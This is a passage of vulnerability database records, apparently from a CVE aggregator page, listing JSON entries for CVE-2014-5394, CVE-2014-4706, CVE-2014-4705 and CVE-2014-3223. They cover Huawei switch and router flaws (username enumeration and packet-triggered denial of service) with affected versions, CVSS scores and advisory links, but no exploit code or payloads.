                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "5D0B5718-9465-476F-B2FA-FFC6FB08E354",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "E4EE71EF-90D8-40C6-9E80-A543ED32E976",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "8C2BF2B6-915B-4F57-8C75-CD09612985F3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "CBDBE325-B6F4-475F-B7F8-F3142F730039",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "121BEE57-945E-4368-8AE4-4A823D70D31C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "A802134B-7EC8-4935-878A-4DCD730BCD4E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "DEC329F7-D83F-4119-B8CA-CC819EC872CB",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "4AF84CB7-7EC9-4978-A4F6-FD5746AF1CE9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "279D9CE4-AAEF-4EFC-8340-668CFCF47717",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D5033F0-7E4F-431A-B4EA-E5D5D1FCFE5E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "93E7A87E-E2FB-4852-9BE5-164822801822",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "BA5C970C-03B5-4757-B3B8-34CF1DFC3482",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "9D07FB95-7CE7-480A-BF2D-87017EFAE038",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "7082EE3F-3174-42C2-B010-5078DC752D67",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "73796844-B30E-4040-AF4E-105AB6BA357F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CB0108A-2462-45D6-8A82-8681E8167D6C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v100r006c05:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B863F3A-38C5-4E36-8E71-713B12EE6889",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "17566603-275F-4E6B-B5D9-4A716EEC03DC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v100r006c05:*:*:*:*:*:*:*",
                     matchCriteriaId: "CA7D9357-D179-4B24-A073-17BA09AEC7E9",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DD2CD071-58E4-4061-8217-990453213470",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s3300_firmware:v100r006c05:*:*:*:*:*:*:*",
                     matchCriteriaId: "3DBB1A49-B169-40F4-B611-C739896A2A71",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s3300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "1A1410A1-ADCC-474F-ABEE-F0FE48E4CD7A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s3700_firmware:v100r006c05:*:*:*:*:*:*:*",
                     matchCriteriaId: "021F224A-F28F-4192-883C-8A75898BEA84",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s3700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B7F84390-E120-406B-967D-B473EB110EA9",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple Huawei Campus switches allow remote attackers to enumerate usernames via vectors involving use of SSH by the maintenance terminal.",
      },
      {
         lang: "es",
         value: "Múltiples switches Huawei Campus permiten que los atacantes remotos enumeren los nombres de usuario mediante vectores que involucren el uso de SSH por el terminal de mantenimiento.",
      },
   ],
   id: "CVE-2014-5394",
   lastModified: "2024-11-21T02:11:58.220",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:M/Au:N/C:P/I:N/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "HIGH",
               attackVector: "NETWORK",
               availabilityImpact: "NONE",
               baseScore: 5.9,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "HIGH",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
               version: "3.0",
            },
            exploitabilityScore: 2.2,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2018-01-08T19:29:00.610",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/us/psirt/security-advisories/2014/hw-362701",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://www.securityfocus.com/bid/69302",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/97763",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/us/psirt/security-advisories/2014/hw-362701",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://www.securityfocus.com/bid/69302",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/97763",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-200",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

CVE-2014-4706 (GCVE-0-2014-4706)
Vulnerability from cvelistv5
Published
2017-04-02 20:00
Modified
2024-08-06 11:27
Severity ?
Summary
Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow.
References
Impacted products
Vendor Product Version
n/a Campus S3700HI, S5700, S6700 S3300HI, S5300, S6300, S9300, S7700,LSW S9700,Campus S5700, S6700,Campus S7700, S9300E, S2350, S2750,S9300,S9300E, Campus S3700HI with software V200R001C00SPC300,Campus S5700 with software V200R002C00SPC100,Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500,LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S2350 with software V200R003C00SPC300,S2750 with software V200R003C00SPC300,S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S5700 with software V200R001C00SPC300,V200R003C00SPC300,S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S7700 with software V200R001C00SPC300,S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S9300E with software V200R003C00SPC300,V200R003C00SPC500, Version: Campus S3700HI, S5700, S6700 S3300HI, S5300, S6300, S9300, S7700,LSW S9700,Campus S5700, S6700,Campus S7700, S9300E, S2350, S2750,S9300,S9300E, Campus S3700HI with software V200R001C00SPC300,Campus S5700 with software V200R002C00SPC100,Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500,LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S2350 with software V200R003C00SPC300,S2750 with software V200R003C00SPC300,S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S5700 with software V200R001C00SPC300,V200R003C00SPC300,S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S7700 with software V200R001C00SPC300,S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S9300E with software V200R003C00SPC300,V200R003C00SPC500,
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T11:27:36.889Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/hw-343218",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "Campus S3700HI, S5700, S6700 S3300HI, S5300, S6300, S9300, S7700,LSW S9700,Campus S5700, S6700,Campus S7700, S9300E, S2350, S2750,S9300,S9300E, Campus S3700HI with software V200R001C00SPC300,Campus S5700 with software V200R002C00SPC100,Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500,LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S2350 with software V200R003C00SPC300,S2750 with software V200R003C00SPC300,S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S5700 with software V200R001C00SPC300,V200R003C00SPC300,S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S7700 with software V200R001C00SPC300,S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S9300E with software V200R003C00SPC300,V200R003C00SPC500,",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "Campus S3700HI, S5700, S6700 S3300HI, S5300, S6300, S9300, S7700,LSW S9700,Campus S5700, S6700,Campus S7700, S9300E, S2350, S2750,S9300,S9300E, Campus S3700HI with software V200R001C00SPC300,Campus S5700 with software V200R002C00SPC100,Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500,LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S2350 with software V200R003C00SPC300,S2750 with software V200R003C00SPC300,S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S5700 with software V200R001C00SPC300,V200R003C00SPC300,S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S7700 with software V200R001C00SPC300,S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S9300E with software V200R003C00SPC300,V200R003C00SPC500,",
                  },
               ],
            },
         ],
         datePublic: "2017-03-27T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "Heap Overflow",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-04-02T19:57:01",
            orgId: "25ac1063-e409-4190-8079-24548c77ea2e",
            shortName: "huawei",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/hw-343218",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@huawei.com",
               ID: "CVE-2014-4706",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Campus S3700HI, S5700, S6700 S3300HI, S5300, S6300, S9300, S7700,LSW S9700,Campus S5700, S6700,Campus S7700, S9300E, S2350, S2750,S9300,S9300E, Campus S3700HI with software V200R001C00SPC300,Campus S5700 with software V200R002C00SPC100,Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500,LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S2350 with software V200R003C00SPC300,S2750 with software V200R003C00SPC300,S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S5700 with software V200R001C00SPC300,V200R003C00SPC300,S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S7700 with software V200R001C00SPC300,S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S9300E with software V200R003C00SPC300,V200R003C00SPC500,",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "Campus S3700HI, S5700, S6700 S3300HI, S5300, S6300, S9300, S7700,LSW S9700,Campus S5700, S6700,Campus S7700, S9300E, S2350, S2750,S9300,S9300E, Campus S3700HI with software V200R001C00SPC300,Campus S5700 with software V200R002C00SPC100,Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500,LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S2350 with software V200R003C00SPC300,S2750 with software V200R003C00SPC300,S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S5700 with software V200R001C00SPC300,V200R003C00SPC300,S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300,S7700 with software V200R001C00SPC300,S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500,S9300E with software V200R003C00SPC300,V200R003C00SPC500,",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "Heap Overflow",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/hw-343218",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/hw-343218",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "25ac1063-e409-4190-8079-24548c77ea2e",
      assignerShortName: "huawei",
      cveId: "CVE-2014-4706",
      datePublished: "2017-04-02T20:00:00",
      dateReserved: "2014-07-01T00:00:00",
      dateUpdated: "2024-08-06T11:27:36.889Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2014-4705 (GCVE-0-2014-4705)
Vulnerability from cvelistv5
Published
2018-01-30 17:00
Modified
2024-08-06 11:27
Severity ?
Summary
Multiple heap-based buffer overflows in the eSap software platform in Huawei Campus S9300, S7700, S9700, S5300, S5700, S6300, and S6700 series switches; AR150, AR160, AR200, AR1200, AR2200, AR3200, AR530, NetEngine16EX, SRG1300, SRG2300, and SRG3300 series routers; and WLAN AC6005, AC6605, and ACU2 access controllers allow remote attackers to cause a denial of service (device restart) via a crafted length field in a packet.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T11:27:36.062Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "59349",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/59349",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345171.htm",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2014-06-16T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple heap-based buffer overflows in the eSap software platform in Huawei Campus S9300, S7700, S9700, S5300, S5700, S6300, and S6700 series switches; AR150, AR160, AR200, AR1200, AR2200, AR3200, AR530, NetEngine16EX, SRG1300, SRG2300, and SRG3300 series routers; and WLAN AC6005, AC6605, and ACU2 access controllers allow remote attackers to cause a denial of service (device restart) via a crafted length field in a packet.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-01-30T16:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "59349",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/59349",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345171.htm",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2014-4705",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple heap-based buffer overflows in the eSap software platform in Huawei Campus S9300, S7700, S9700, S5300, S5700, S6300, and S6700 series switches; AR150, AR160, AR200, AR1200, AR2200, AR3200, AR530, NetEngine16EX, SRG1300, SRG2300, and SRG3300 series routers; and WLAN AC6005, AC6605, and ACU2 access controllers allow remote attackers to cause a denial of service (device restart) via a crafted length field in a packet.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "59349",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/59349",
                  },
                  {
                     name: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345171.htm",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345171.htm",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2014-4705",
      datePublished: "2018-01-30T17:00:00",
      dateReserved: "2014-07-01T00:00:00",
      dateUpdated: "2024-08-06T11:27:36.062Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2014-3223 (GCVE-0-2014-3223)
Vulnerability from cvelistv5
Published
2017-04-02 20:00
Modified
2024-08-06 10:35
Severity ?
Summary
Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches.
References
Impacted products
Vendor Product Version
n/a S9300,S2300,S3300,S5300,S6300 S9300 with software V100R006C00SPC500??S9300 with software V100R006C00SPC800,S2300,S3300,S5300,S6300 with software V100R006C00SPC800,V100R006C01SPC100, V100R006C03 Version: S9300,S2300,S3300,S5300,S6300 S9300 with software V100R006C00SPC500??S9300 with software V100R006C00SPC800,S2300,S3300,S5300,S6300 with software V100R006C00SPC800,V100R006C01SPC100, V100R006C03
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T10:35:56.984Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/hw-329625",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "S9300,S2300,S3300,S5300,S6300 S9300 with software V100R006C00SPC500??S9300 with software V100R006C00SPC800,S2300,S3300,S5300,S6300 with software V100R006C00SPC800,V100R006C01SPC100, V100R006C03",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "S9300,S2300,S3300,S5300,S6300 S9300 with software V100R006C00SPC500??S9300 with software V100R006C00SPC800,S2300,S3300,S5300,S6300 with software V100R006C00SPC800,V100R006C01SPC100, V100R006C03",
                  },
               ],
            },
         ],
         datePublic: "2017-03-27T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "Y.1731",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-04-02T19:57:01",
            orgId: "25ac1063-e409-4190-8079-24548c77ea2e",
            shortName: "huawei",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/hw-329625",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@huawei.com",
               ID: "CVE-2014-3223",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "S9300,S2300,S3300,S5300,S6300 S9300 with software V100R006C00SPC500??S9300 with software V100R006C00SPC800,S2300,S3300,S5300,S6300 with software V100R006C00SPC800,V100R006C01SPC100, V100R006C03",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "S9300,S2300,S3300,S5300,S6300 S9300 with software V100R006C00SPC500??S9300 with software V100R006C00SPC800,S2300,S3300,S5300,S6300 with software V100R006C00SPC800,V100R006C01SPC100, V100R006C03",
                                       },
